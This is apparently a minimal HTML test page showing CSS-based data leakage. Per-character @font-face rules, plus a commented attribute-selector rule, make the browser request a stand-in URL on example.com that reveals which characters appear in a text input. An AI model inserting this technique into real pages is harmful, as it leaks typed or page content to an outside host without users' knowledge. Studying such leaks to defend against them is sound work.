<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    /* input[value="a"] { background: url(https://example.com/?value=a); } */
    @font-face { font-family: x; src: url(https://example.com/?value=a), local(Impact); unicode-range: U+61; }
    @font-face { font-family: x; src: url(https://example.com/?value=b), local(Impact); unicode-range: U+62; }
    @font-face { font-family: x; src: url(https://example.com/?value=c), local(Impact); unicode-range: U+63; }
    @font-face { font-family: x; src: url(https://example.com/?value=d), local(Impact); unicode-range: U+64; }
    input { font-family: x, 'Comic sans ms'; }
  </style>
</head>
<body>
  <input type=text>
</body>
</html>